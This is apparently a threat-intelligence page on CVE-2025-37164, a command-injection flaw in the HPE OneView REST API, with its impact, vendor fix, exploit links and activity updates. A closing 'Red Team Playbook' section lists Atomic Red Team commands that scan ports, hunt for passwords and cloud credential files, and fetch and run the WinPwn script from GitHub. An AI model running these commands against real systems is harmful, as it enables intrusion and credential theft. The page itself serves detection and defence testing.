CVE-2025-37164
Overview
This vulnerability is a remote code execution flaw caused by improper input validation leading to unsafe dynamic command execution within the HPE OneView API. Specifically, the issue arises from the /rest/id-pools/executeCommand endpoint, which accepts user-supplied commands without adequate sanitization. The affected component is the HPE OneView REST API service, which processes these commands and executes them on the underlying system, enabling injection of arbitrary commands.
Vulnerability Description
A remote code execution issue exists in HPE OneView.
Impact
An unauthenticated attacker can execute arbitrary system commands remotely, potentially gaining full control over the affected HPE OneView server. This enables unauthorized access to sensitive data, disruption of management operations, and lateral movement within the network. No user interaction or valid credentials are required to exploit this vulnerability, increasing the risk of widespread compromise in environments using vulnerable HPE OneView versions.
Solution
Hewlett Packard Enterprise recommends applying the hotfix released in their advisory dated December 16, 2025, which restricts access to the vulnerable /rest/id-pools/executeCommand endpoint by returning HTTP 404 responses. This fix is included in HPE OneView version 11.0 and later. Administrators should refer to the official HPE advisory (https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbgn04985en_us) for detailed patch installation instructions and verify that their deployment is updated accordingly.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
A critical remote code execution vulnerability has been identified in HPE OneView, a management platform designed to streamline the administration of IT infrastructure. This vulnerability allows an attacker to execute arbitrary code on the affected system without requiring authentication. The underlying issue stems from improper input validation and insufficient access controls, which can be exploited by sending specially crafted requests to the application. This flaw highlights the importance of robust input sanitization and security measures in software design, as it opens the door for malicious actors to manipulate the system and potentially gain full control.
The attack vectors associated with this vulnerability are particularly concerning due to their simplicity and effectiveness. An attacker could leverage network access to the HPE OneView management interface, which is often exposed to the internet or internal networks. By crafting specific payloads that exploit the vulnerability, an attacker can execute commands on the server hosting the application. This could be achieved through various methods, including phishing campaigns that trick users into accessing malicious links or directly targeting the management interface with automated scripts. The potential for exploitation is exacerbated by the fact that many organizations may not have adequate monitoring or security controls in place to detect such unauthorized activities.
The real-world impact of this vulnerability is significant, especially for organizations relying on HPE OneView for critical infrastructure management. Successful exploitation could lead to unauthorized access to sensitive data, disruption of services, and even complete system compromise. The business risks associated with such an incident include financial losses, reputational damage, and regulatory penalties, particularly if sensitive customer or operational data is exposed. Additionally, the high CVSS score indicates that the vulnerability poses a severe threat, necessitating immediate attention from organizations that utilize the affected product.
To detect and mitigate this vulnerability, organizations should implement a multi-layered security approach. Regular vulnerability assessments and penetration testing can help identify weaknesses in the system before they can be exploited. Additionally, organizations should ensure that they are running the latest version of HPE OneView, as vendors typically release patches to address known vulnerabilities. Network segmentation can also limit exposure by restricting access to the management interface, thereby reducing the attack surface. Furthermore, deploying intrusion detection systems (IDS) can help monitor for suspicious activity and alert administrators to potential exploitation attempts.
In conclusion, the remote code execution vulnerability in HPE OneView represents a serious threat to organizations leveraging this management platform. With the potential for severe consequences stemming from exploitation, it is imperative that organizations take proactive measures to secure their systems. By adopting comprehensive detection and mitigation strategies, businesses can safeguard their infrastructure and minimize the risks associated with this vulnerability. The evolving landscape of cybersecurity threats necessitates continuous vigilance and adaptation to protect against emerging vulnerabilities and maintain the integrity of critical IT systems.
CSURFACE threat intelligence has observed a notable surge in detection activity related to CVE-2025-37164, indicating increased adversary interest and potential exploitation attempts targeting HPE OneView environments. While the overall exploit trend remains stable, the qualitative rise in telemetry suggests that threat actors are actively probing for vulnerable systems, likely leveraging publicly available proof-of-concept exploits and the Metasploit module. This uptick underscores the persistence of this critical remote code execution vulnerability as a viable attack vector. For defenders, the increased detection frequency signals a heightened risk environment where opportunistic exploitation attempts may become more frequent and widespread. Although ransomware use linked to this vulnerability remains unconfirmed, the availability of mature exploit tools lowers the barrier for attackers, potentially accelerating weaponization. Consequently, the threat level associated with CVE-2025-37164 should be viewed as elevated, warranting sustained vigilance and prioritization within security monitoring frameworks.
Update 2 — July 10, 2026
CSURFACE threat intelligence has observed a marked escalation in detection activity related to CVE-2025-37164, indicating increased adversary interest and probing attempts targeting HPE OneView environments. This surge in telemetry suggests that threat actors are intensifying reconnaissance or exploitation efforts, likely facilitated by the availability of multiple proof-of-concept exploits and a Metasploit module that lowers the technical barrier for attackers. Although ransomware usage linked to this vulnerability remains unconfirmed, the heightened detection frequency underscores a growing risk of opportunistic exploitation campaigns. For defenders, this evolving landscape demands sustained attention as the likelihood of successful remote code execution attempts rises, particularly in environments where vendor patches or hotfixes have not been applied. Consequently, the threat level associated with CVE-2025-37164 should be considered elevated beyond prior assessments, reflecting a more active exploitation environment that could accelerate weaponization and impact.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Hpe | Oneview | All |
cpe:2.3:a:hpe:oneview:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
HPE OneView unauthenticated RCE
exploits/linux/http/hpe_oneview_rce
|
Nguyen Quoc Khanh, remmons-r7, sfewer-r7 | Unknown | unix, linux | View |
GitHub PoCs (3)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
g0vguy/CVE-2025-37164-PoC
PoC for CVE-2025-37164
|
g0vguy | 6 | 2 | 2025-12-19 | View |
|
LACHHAB-Anas/Exploit_CVE-2025-37164
Exploit for the CVE-2025-37164
|
LACHHAB-Anas | 1 | 0 | 2026-01-06 | View |
|
rxerium/CVE-2025-37164
Detection for CVE-2025-37164
|
rxerium | 1 | 0 | 2025-12-18 | View |
Threat Feed
8 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (5)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2025-37164 |
| support.hpe.com |
GitHub CVE
|
https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbgn04985en_us&docLocale=en_US |
| github.com |
NVD API
Exploit
|
https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/hpe_oneview_rce.rb |
| support.hpe.com |
NVD API
Vendor Advisory
|
https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbgn04985en_us&docLocale=en_US#vulnerability-summary-1 |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-37164 |